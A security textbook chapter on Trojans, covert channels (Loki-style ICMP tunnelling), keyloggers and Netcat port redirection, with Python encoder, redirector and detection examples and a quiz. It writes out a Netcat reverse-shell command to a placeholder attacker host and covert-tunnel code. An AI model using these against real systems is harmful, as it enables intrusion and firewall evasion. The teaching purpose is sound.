The term covert channel was coined by Butler Lampson in 1973, in his paper on the confinement problem, and is defined there as "mechanisms not intended for information transfer of any sort, such as the service program's effect on system load." This definition specifically differentiates covert channels from the normal mechanisms used to transfer information.

Additionally the U.S. Department of Defense's Trusted Computer System Evaluation Criteria (TCSEC, the "Orange Book") defines two specific types of covert channels, storage channels and timing channels:

  • Covert storage channels—One process writes, directly or indirectly, to a storage location (a file, a disk block, or a shared attribute such as a file name or size) and another process reads it, directly or indirectly. The location is used as a mailbox even though it was never designed for communication between those two parties.

  • Covert timing channels—One process signals by modulating its own use of a system resource (CPU time, memory, disk activity) in a specific, predefined way, so that the delays a second process observes carry the message. Nothing is written for the receiver to read; the information is in the timing.

Tools to exploit covert channels include:

  • Loki—Originally a proof of concept showing that ICMP traffic can carry a covert channel. Loki passes its data in the data field of ICMP echo request and echo reply packets. That field can carry arbitrary bytes, but in ordinary ping traffic it holds only filler that nobody inspects, which makes it an ideal place to hide data.

  • ICMP backdoor—Similar to Loki, but carries its data in echo replies rather than echo requests, since replies to outbound pings are commonly allowed through firewalls.

  • 007Shell—Also uses ICMP packets to send information, but goes the extra step of padding the packets so they are the same size as a normal ping.

  • B0CK—Similar to Loki, but uses IGMP packets instead of ICMP.

  • Reverse World Wide Web (WWW) Tunneling Shell—Creates covert channels through firewalls and proxies by disguising its traffic as ordinary outbound Web (HTTP) requests.

  • AckCmd—Provides a command shell on Windows systems. Communication takes place in TCP packets with only the ACK flag set, which stateless packet filters that block only new (SYN) connections let through.
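As an added example (not code from the page, nor from Loki or any of the other tools listed), the following Python builds Loki-style ICMP echo packets whose data field carries a hidden message, reassembles the message on the receiving side, and then plays the defender: it checks whether the data field matches what a stock ping client sends and how much entropy it has. The Windows and iputils ping filler patterns are public knowledge; the 4.0-bit entropy threshold and the 0xBEEF identifier are assumptions chosen for the example. Nothing is put on the wire; packets are only constructed and parsed in memory.

```python
# Loki-style ICMP covert channel, plus a detector for it.
# Added example with constructed data; it builds and parses packet bytes in memory
# and never sends anything.
import math
import struct
from collections import Counter

ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0

# Data fields that stock ping clients send, so the detector knows what "normal" looks like.
WINDOWS_PING_DATA = b"abcdefghijklmnopqrstuvwabcdefghi"        # Windows ping, 32 bytes
LINUX_PING_FILLER = bytes(range(0x10, 0x10 + 48))              # iputils: 8-byte timestamp + this

ENTROPY_THRESHOLD = 4.0   # bits per byte; an assumed tuning value for this example, not a standard


def rfc1071_checksum(data: bytes) -> int:
    """Internet checksum (RFC 1071): one's-complement sum of 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(icmp_type: int, ident: int, seq: int, data: bytes) -> bytes:
    """Assemble an ICMP echo request or reply with a valid checksum."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = rfc1071_checksum(header + data)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + data


def parse_echo(packet: bytes):
    """Return (type, ident, seq, data); raise ValueError if the checksum does not verify."""
    if len(packet) < 8:
        raise ValueError("short ICMP packet")
    if rfc1071_checksum(packet) != 0:      # a correctly checksummed packet sums to zero
        raise ValueError("bad ICMP checksum")
    icmp_type, _code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return icmp_type, ident, seq, packet[8:]


def encode_covert(message: bytes, ident: int = 0xBEEF, chunk: int = 32) -> list:
    """Sender side: spread the message over the data fields of echo requests.
    Each packet is padded to 32 data bytes so it is the same size as a Windows ping
    (the padding trick the text attributes to 007Shell)."""
    packets = []
    for seq, offset in enumerate(range(0, len(message), chunk), start=1):
        piece = message[offset:offset + chunk].ljust(chunk, b"\x00")
        packets.append(build_echo(ICMP_ECHO_REQUEST, ident, seq, piece))
    return packets


def decode_covert(packets) -> bytes:
    """Receiver side: order by sequence number, concatenate, strip the zero padding."""
    pieces = []
    for packet in packets:
        _, _, seq, data = parse_echo(packet)
        pieces.append((seq, data))
    pieces.sort()
    return b"".join(data for _, data in pieces).rstrip(b"\x00")


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; encrypted or compressed tunnel data scores high."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_like_stock_ping(data: bytes) -> bool:
    """True if the data field is exactly what a common ping client would send."""
    if data == WINDOWS_PING_DATA:
        return True
    return len(data) == 56 and data[8:] == LINUX_PING_FILLER


def classify_echo(packet: bytes) -> str:
    """Detector: 'ok', 'unusual-data', 'high-entropy' or 'not-echo' for one ICMP packet."""
    icmp_type, _ident, _seq, data = parse_echo(packet)
    if icmp_type not in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY):
        return "not-echo"
    if looks_like_stock_ping(data):
        return "ok"
    if shannon_entropy(data) > ENTROPY_THRESHOLD:
        return "high-entropy"
    return "unusual-data"


if __name__ == "__main__":
    tunnelled = encode_covert(b"id;uname -a")
    print(decode_covert(tunnelled))
    print([classify_echo(p) for p in tunnelled])
    print(classify_echo(build_echo(ICMP_ECHO_REQUEST, 1, 1, WINDOWS_PING_DATA)))
```

Two defensive points fall out of this. Packet size alone is not a reliable signal, because the sender can pad to 32 or 56 bytes as easily as the example does, so compare the data field against the patterns your own ping clients actually send. And once the tunnel is encrypted, the pattern match fails and the entropy check is what remains, so echo payloads that score high deserve a look.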

The Role of Keyloggers

Another powerful way of extracting information from a victim's system is to use a keylogger. Software in this category captures keyboard activity on the target system and reports it back to the attacker. Under the right conditions it captures passwords, confidential information as it is typed, and other data.

Keyloggers are implemented in one of two ways: software or hardware. A software keylogger is a small piece of code that sits in the path between the keyboard and the operating system or applications (a keyboard hook or a keyboard filter driver, for example) and records every keystroke it sees. It is typically installed the way any other Trojan would be: bundled with something else and offered to the victim, who installs it and becomes infected. Once installed, it delivers everything the attacker is looking for, usually by writing to a hidden log that is periodically e-mailed or uploaded.

Under the right conditions software keyloggers can be detected, so an alternative exists in hardware. Hardware keyloggers plug in between the keyboard and a universal serial bus (USB) or PS/2 port and record the keystroke signals passing through. No software runs on the host, so no antivirus scan or process list will reveal them. What makes them particularly nasty is that they are hard to detect unless you physically inspect the machine. Consider that most computer users never look at the back of their system and you have a recipe for disaster.

Software

Some of the keystroke recorders include:

  • IKS Software Keylogger—A Windows based keylogger that runs in the background on a system at a very low level. Due to the way this software is designed and runs on a system, it is very hard to detect using most conventional means. The program is designed to run at such a low level that it will not show up in process lists or through normal detection methods.

  • Ghost Keylogger—Another Windows-based keylogger that is designed to run silently in the background on a system much like IKS. The difference between this software and IKS is the ability to record activity to an encrypted log that can be e-mailed to the attacker.

  • Spector Pro—Designed to capture keystroke activity, e-mail passwords, chat conversations and logs, and instant messages.

  • FakeGINA—An advanced keylogger that is very specific in its choice of targets. It is a replacement GINA (Graphical Identification and Authentication) DLL that sits between the Winlogon process and the real logon DLL on older Windows versions, so it sees every username and password as the user logs on and records them before passing them along.

Port Redirection

One common technique that works alongside covert channels is port redirection. Port redirection is a process in which communications arriving on one port are forwarded to a different port, usually on a different system. In practice this means traffic that is destined for one system is forwarded to another system, which lets an attacker reach a host or service that a firewall would otherwise block.

When a packet is sent to a destination, it must have two things in place, an IP address and a port number, like so:

192.168.1.100:80

Or:

<ip_address>:<port number>

If a packet is destined for a Web server on a system with the address 192.168.1.210 it would look like the following:

192.168.1.210:80

This would tell the packet to go to the IP address and access port 80, which, by default, is the port used by the Web server service. As was seen in a previous chapter, every system has 65,535 usable ports for TCP and another 65,535 for UDP on which services can listen. Some ports are used far more often than others: HTTP uses port 80 and FTP uses port 21. In practice only those ports that applications actually use should be reachable; anything not explicitly in use should be blocked, and on a well-run network it typically is. This poses a challenge for the hacker, one that can be overcome using port redirection.

Port redirection is made possible by setting up a piece of software to listen on specified ports and when packets are received on these ports, the traffic is sent on to another system. Currently there are a myriad of tools available to do just this very thing, but the one we will look at more closely is Netcat.

Table 11-2. Options for Netcat.

SWITCH               DESCRIPTION

nc -d                Detaches Netcat from the console and runs it in the background (Windows build only)
nc -l -p [port]      Creates a simple listener on a TCP port; adding -u places it in UDP mode
nc -e [program]      Runs the named program once a connection is made, with the program's stdin and stdout tied to the connection (only in builds compiled with this option)
nc -w [timeout]      Sets a timeout, in seconds, after which Netcat gives up on a connection and quits
nc -n                Uses numeric IP addresses only, with no DNS lookups
program | nc         Pipes the output of a program into Netcat
nc | program         Pipes the output of Netcat into a program
nc -h                Displays the help options
nc -v                Puts Netcat into verbose mode (-vv is more verbose still)
nc -g or nc -G       Specifies loose source-routing hops (-g) or the source-routing pointer (-G)
nc -t                Answers Telnet option negotiation
nc -o [file]         Writes a hex dump of the traffic to a file
nc -z                Zero-I/O mode, used for port scanning

Netcat is a simple command-line utility available for Linux, UNIX, and Windows platforms. It reads and writes data across TCP or UDP connections, and because it can both listen for and initiate connections it can relay traffic from one port to another. Table 11-2 shows some of the options that can be used with Netcat.

Note

Netcat also has a close cousin known as Cryptcat, which adds the ability to encrypt the traffic it sends back and forth between systems. For the purposes of the discussion we will have here in this chapter, we will use Netcat alone, but consider using Cryptcat if you want the extra protection that comes with encrypting your communication.

Let us take a look at the steps involved to use Netcat to perform port redirection.

The first step is for the attacker to set up what is known as a listener on his or her own system. This prepares the attacker's system to receive the connection from the victim's system. To set up a listener on TCP port 80, the command is as follows:

nc -n -v -l -p 80

After this, the attacker needs to execute a command on the victim's system that connects back to the listener and hands it a shell. From the victim's system, the attacker runs:

nc -n hackers_ip 80 -e cmd.exe

Once this is entered, the net effect is that a command shell from the victim's system is attached to the attacker's listener, ready for input. Strictly speaking this is a reverse shell rather than port redirection: the connection is outbound from the victim to port 80, which most firewalls allow, so the shell rides through a port that is open for Web traffic. Two caveats apply. The -e switch exists only in Netcat builds compiled with that option (many Linux distributions ship a build without it), and on a UNIX or Linux victim the program would be /bin/sh rather than cmd.exe.

Of course Netcat has other capabilities, including port scanning and transferring files to or from a victim's system.

Port scanning can be accomplished using the following command, where the port range is written without spaces around the hyphen:

nc -v -z -w1 IPaddress <start port>-<ending port>

This scans the specified range of ports and reports each one that accepts a connection; -z sends no data and -w1 gives up on each port after one second.

Of course Netcat isn't the only available tool to do port redirection. Tools such as Datapipe and Fpipe can perform the same functions albeit in different ways.
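The following Python is an added example, not code from the page or from Netcat, Datapipe or Fpipe, of what a port redirector actually does: it listens on a local port and copies bytes in both directions between each client and a configured target host and port. So that it runs offline, it also includes a stand-in for the real service (an upper-casing echo server) and a client; everything binds to 127.0.0.1 on ports the operating system picks, which are assumptions for the demo.

```python
# Datapipe/Fpipe-style TCP port redirector, plus a small demo service and client.
# Added example; nothing here is from the page or from any of the tools it names.
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes from src to dst until src hits EOF, then pass the EOF on to dst."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _bridge(client: socket.socket, target: tuple) -> None:
    """Open the onward connection and splice the two sockets in both directions."""
    try:
        upstream = socket.create_connection(target, timeout=5)
    except OSError:
        client.close()          # nothing behind the pipe: drop the client
        return
    upstream.settimeout(None)
    back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
    back.start()
    _pump(client, upstream)     # client -> target in this thread
    back.join()                 # wait for target -> client to drain
    client.close()
    upstream.close()


def _serve(handler, host: str = "127.0.0.1"):
    """Bind an ephemeral port and hand each accepted socket to handler in its own thread.
    Returns (port, stop_function)."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((host, 0))
    server.listen(16)
    server.settimeout(0.2)      # lets the accept loop notice the stop flag
    stop = threading.Event()

    def accept_loop():
        while not stop.is_set():
            try:
                conn, _ = server.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            conn.settimeout(None)
            threading.Thread(target=handler, args=(conn,), daemon=True).start()
        server.close()

    threading.Thread(target=accept_loop, daemon=True).start()
    return server.getsockname()[1], stop.set


def start_redirector(target_host: str, target_port: int):
    """Listen locally and forward every connection to target_host:target_port."""
    return _serve(lambda conn: _bridge(conn, (target_host, target_port)))


def start_upper_echo_service():
    """Stand-in for the real service behind the pipe: echoes its input in upper case."""
    def handle(conn):
        try:
            with conn:
                data = conn.recv(4096)
                while data:
                    conn.sendall(data.upper())
                    data = conn.recv(4096)
        except OSError:
            pass
    return _serve(handle)


def send_through(port: int, payload: bytes) -> bytes:
    """A client that only ever talks to the redirector's port, never to the real service."""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        out = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                return out
            out += chunk


def demo(payload: bytes = b"hello through the pipe") -> bytes:
    """Wire service -> redirector -> client and return what the client got back."""
    svc_port, stop_svc = start_upper_echo_service()
    redir_port, stop_redir = start_redirector("127.0.0.1", svc_port)
    try:
        return send_through(redir_port, payload)
    finally:
        stop_redir()
        stop_svc()


if __name__ == "__main__":
    print(demo())
```

The client never learns the service's real address or port, which is exactly the property an attacker wants when a pipe of this kind sits on a compromised host inside the perimeter: the firewall sees a connection to the pipe's port, and the pipe quietly carries it on to a host the firewall would not have allowed directly. The same property is what makes a redirector useful to a defender running a honeypot or a transparent proxy.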

Software Protection

The best way to blunt the impact of Trojans is to stop them before they become an issue. When you become proactive instead of reactive, you can make management easier. Using all the tools available to you for prevention can make all the difference. Use of the following applications becomes a necessity when protecting a system:

  • Antivirus—Having software in place that actively looks for infections and eradicates them is paramount. Several of the applications mentioned here as Trojans can be thwarted by an antivirus.

  • Anti-spyware—This software works in concert with other forms of protection looking for suspicious behavior and items such as keyloggers.

  • Firewalls—Stopping communications between software such as clients and servers can block attacks quite easily and blunt the effect of Trojans in the event they get on the system.

  • Updates—Updating software and systems is a key defensive strategy that can address defects in software such as browsers that can be exploited by attackers.

  • Education—Knowing is half the battle and educating your users on proper procedures and how to prevent infections can yield benefits that other methods cannot.

What do you do if you suspect you are a victim already? Your toolbox already holds a number of tools that can be used to capture the telltale signs of infection. These include the following:

  • Task Manager—Provided with Windows and used to display detailed information about running processes

  • ps—The command-line equivalent of Task Manager, used to display the currently running processes on UNIX/Linux systems

  • netstat—Displays active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table, IPv4 statistics, and more; on Windows, netstat -ano adds the owning process ID for each socket

  • Tlist—A Windows-based tool used to list currently running processes on local or remote machines

  • TCPView—A GUI tool originally from Winternals (now part of the Microsoft Sysinternals suite) that displays every TCP and UDP endpoint on the system together with the process that owns it

  • Process viewer—A Windows Graphical User Interface (GUI) utility that displays data about running processes

  • Inzider—Lists processes on a Windows system and the ports each one is listening on; Inzider is useful in locating Trojans that have injected themselves into other processes

Note

Remember that if you suspect a system is infected or a piece of media is compromised in any way, do not rely on copies of these tools that live on that system or media. A rootkit that has replaced system files can just as easily have replaced or altered the tools, so that they report nothing wrong. Run known-good copies from trusted, read-only media, and where possible compare their output with what you can observe from outside the system (for example, a port scan from another host against what the system's own netstat claims is listening).
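As an added example of putting netstat and a process listing to work, the following Python parses output in the format of netstat -ano (a constructed sample, not a real capture) together with a constructed PID-to-image table, and flags the two things the text above describes: a listener that is not in the host's baseline, and a process that has borrowed a system binary's name while running from outside the Windows directory. The baseline and the list of commonly borrowed names are assumptions for the example, not part of the page.

```python
# Triage of netstat output against a baseline, cross-checked with which image owns each socket.
# Added example; the netstat text and the process table are constructed for illustration.
import re
from typing import Dict, List, Tuple

# Constructed sample in the format of `netstat -ano` on Windows (not a real capture).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING       3316
  TCP    192.168.1.25:49712     203.0.113.7:80         ESTABLISHED     3316
  TCP    192.168.1.25:49713     198.51.100.9:443       ESTABLISHED     2204
  UDP    0.0.0.0:137            *:*                                    4
"""

# Constructed PID -> image path table (what tasklist or tlist would give you).
SAMPLE_PROCESSES: Dict[int, str] = {
    4: "System",
    912: r"C:\Windows\System32\svchost.exe",
    2204: r"C:\Program Files\Browser\browser.exe",
    3316: r"C:\Users\alice\AppData\Local\Temp\svchost.exe",
}

# Baseline of (protocol, port) listeners expected on this host: an assumption for the example.
ALLOWED_LISTENERS = {("TCP", 135), ("TCP", 445), ("UDP", 137)}

# Names of Windows binaries a Trojan commonly borrows to blend into process lists (assumed list).
SYSTEM_BINARY_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "services.exe"}
WINDOWS_DIR = "c:\\windows\\"

# Proto, local endpoint, foreign endpoint, optional state (UDP rows have none), PID.
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$")


def split_endpoint(endpoint: str) -> Tuple[str, int]:
    """'192.168.1.25:49712' -> ('192.168.1.25', 49712); '*:*' -> ('*', -1)."""
    host, _, port = endpoint.rpartition(":")
    return host, (int(port) if port.isdigit() else -1)


def parse_netstat(text: str) -> List[dict]:
    """Pull (proto, local, foreign, state, pid) rows out of netstat -ano output."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # header and blank lines
        proto, local, foreign, state, pid = m.groups()
        lhost, lport = split_endpoint(local)
        fhost, fport = split_endpoint(foreign)
        rows.append({"proto": proto, "lhost": lhost, "lport": lport,
                     "fhost": fhost, "fport": fport,
                     "state": state or "", "pid": int(pid)})
    return rows


def triage(text: str, processes: Dict[int, str], allowed) -> List[Tuple[str, str]]:
    """Return (finding_kind, detail) pairs for anything that deviates from the baseline."""
    findings = []
    flagged_pids = set()
    for r in parse_netstat(text):
        image = processes.get(r["pid"], "<unknown>")
        name = image.rsplit("\\", 1)[-1].lower()
        # 1. A listener the baseline does not know about (UDP sockets show '*:*' as foreign).
        listening = r["state"] == "LISTENING" or (r["proto"] == "UDP" and r["fhost"] == "*")
        if listening and (r["proto"], r["lport"]) not in allowed:
            findings.append(("unexpected-listener",
                             f'{r["proto"]}/{r["lport"]} pid={r["pid"]} image={image}'))
        # 2. A system binary's name running from outside the Windows directory (process hiding).
        if (r["pid"] not in flagged_pids and name in SYSTEM_BINARY_NAMES
                and not image.lower().startswith(WINDOWS_DIR)):
            flagged_pids.add(r["pid"])
            findings.append(("masquerading-image", f'pid={r["pid"]} image={image}'))
    return findings


if __name__ == "__main__":
    for kind, detail in triage(SAMPLE_NETSTAT, SAMPLE_PROCESSES, ALLOWED_LISTENERS):
        print(f"{kind:20} {detail}")
```

Feed it the output of a known-good netstat and tasklist run from trusted media, as the Note above says. A rootkit that filters what netstat reports will of course hide from this script too, which is why the listing should still be compared against a port scan taken from another host.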

CHAPTER SUMMARY

This chapter looked at one of the oldest forms of malware, known as the Trojan. Trojans are software applications that are designed to deliver control of a system to an attacker. By design, Trojans are meant to be installed quickly and stealthily on a victim's system so as to avoid detection.

Once a Trojan is installed successfully on a system, the next step most of them perform is to open a backdoor. Backdoors are openings put in place by an attacker to bypass the normal security measures that exist on a system. Once these constructs are in place the attacker has the ability to gain stealthy and unchecked access to a system for any purpose that they intended. Typically, this access is given for the purpose of remote access, but it could be for data transfer or other purposes.

Working in concert with a backdoor are two related ideas, the overt channel and the covert channel. A backdoor installed by a Trojan can in turn provide a covert channel that is used to avoid detection and to keep an attack from being stopped. Covert channels are mechanisms for transferring information between systems and processes in ways they were never intended to support. Because that data moves over unsupported channels, the problem becomes a lack of security measures: unsupported channels may not be monitored the way supported ones are, if they are monitored at all. Overt channels are the ways data is expected to be transferred, and inside those channels an attacker can hide covert channels.

KEY CONCEPTS AND TERMS

  • Covert channels

  • Master boot records (MBR)

  • Overt channels

  • Port redirection

  • PS2

  • Trojan construction kit

  • Trusted Computer System Evaluation Criteria (TCSEC)

  • Universal serial bus (USB)

CHAPTER 11 ASSESSMENT

  1. Trojans are a type of malware.

    1. True

    2. False

  2. Covert channels work over

    1. known channels

    2. wireless

    3. networks

    4. security controls

  3. Which of the following is one of the goals of Trojans?

    1. Send data

    2. Change system settings

    3. Open overt channels

    4. Give remote access

  4. Backdoors are an example of covert channels.

    1. True

    2. False

  5. _______ are methods for transferring data in an unmonitored manner.

  6. Backdoors on a system can be used to bypass firewalls and other protective measures.

    1. True

    2. False

  7. Trojans can be used to open backdoors on a system.

    1. True

    2. False

  8. Trojans are designed to be small and stealthy in order to:

    1. Bypass covert channels

    2. Bypass firewalls

    3. Bypass permissions

    4. Bypass detection
